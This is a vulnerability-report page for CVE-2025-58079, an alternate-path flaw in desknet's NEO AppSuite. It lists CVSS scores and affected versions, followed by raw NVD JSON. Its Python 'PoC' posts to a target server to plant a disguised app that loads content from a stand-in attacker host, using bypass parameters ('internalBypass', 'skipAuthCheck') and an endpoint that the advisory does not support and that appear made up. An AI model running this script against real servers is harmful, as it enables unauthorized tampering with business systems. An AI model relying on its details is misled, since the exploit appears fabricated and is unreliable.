Security Vulnerability Report
中文
CVE-2025-58079 CVSS 4.3 MEDIUM

CVE-2025-58079

Published: 2025-10-16 10:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Improper Protection of Alternate Path (CWE-424) in the AppSuite of desknet's NEO V4.0R1.0 to V9.0R2.0 allows an attacker to create malicious AppSuite applications.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

desknet's NEO V4.0R1.0
desknet's NEO V4.0R2.0
desknet's NEO V5.0R1.0
desknet's NEO V5.0R2.0
desknet's NEO V6.0R1.0
desknet's NEO V6.0R2.0
desknet's NEO V7.0R1.0
desknet's NEO V7.0R2.0
desknet's NEO V8.0R1.0
desknet's NEO V8.0R2.0
desknet's NEO V9.0R1.0
desknet's NEO V9.0R2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58079 PoC - desknet's NEO AppSuite Improper Protection of Alternate Path # Vulnerability: CWE-424 Improper Protection of Alternate Path # Affected: desknet's NEO V4.0R1.0 to V9.0R2.0 # CVSS: 4.3 (MEDIUM) - AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N import requests TARGET_URL = "https://target-desknets-neo.example.com" SESSION_COOKIE = "JSESSIONID=authenticated_low_privilege_session" def exploit_alternate_path(): """ Exploit the alternate path in AppSuite to create a malicious application. The vulnerability allows low-privilege users to bypass normal security checks and create AppSuite applications via an unprotected alternate path. """ session = requests.Session() session.headers.update({ "Cookie": SESSION_COOKIE, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" }) # Step 1: Access the alternate/unprotected AppSuite creation endpoint # The alternate path bypasses the normal privilege checks alternate_endpoint = f"{TARGET_URL}/appsuite/alt/create" # Step 2: Prepare malicious AppSuite application payload malicious_payload = { "appName": "LegitimateLookingApp", "appType": "widget", "appUrl": "https://attacker.example.com/malicious.html", "appIcon": "/images/normal_icon.png", "appCategory": "utility", "appDescription": "A useful utility widget", # Bypass parameter exploiting the alternate path "internalBypass": "true", "skipAuthCheck": "1" } # Step 3: Send the request to create the malicious app via alternate path response = session.post(alternate_endpoint, data=malicious_payload) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Malicious AppSuite application created successfully!") print(f"[+] Response: {response.text}") return True else: print(f"[-] Exploit failed. Status: {response.status_code}") return False if __name__ == "__main__": exploit_alternate_path()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58079", "sourceIdentifier": "[email protected]", "published": "2025-10-16T10:15:43.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Protection of Alternate Path (CWE-424) in the AppSuite of desknet's NEO V4.0R1.0 to V9.0R2.0 allows an attacker to create malicious AppSuite applications."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-424"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN90757550/", "source": "[email protected]"}, {"url": "https://www.desknets.com/neo/support/mainte/17475/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.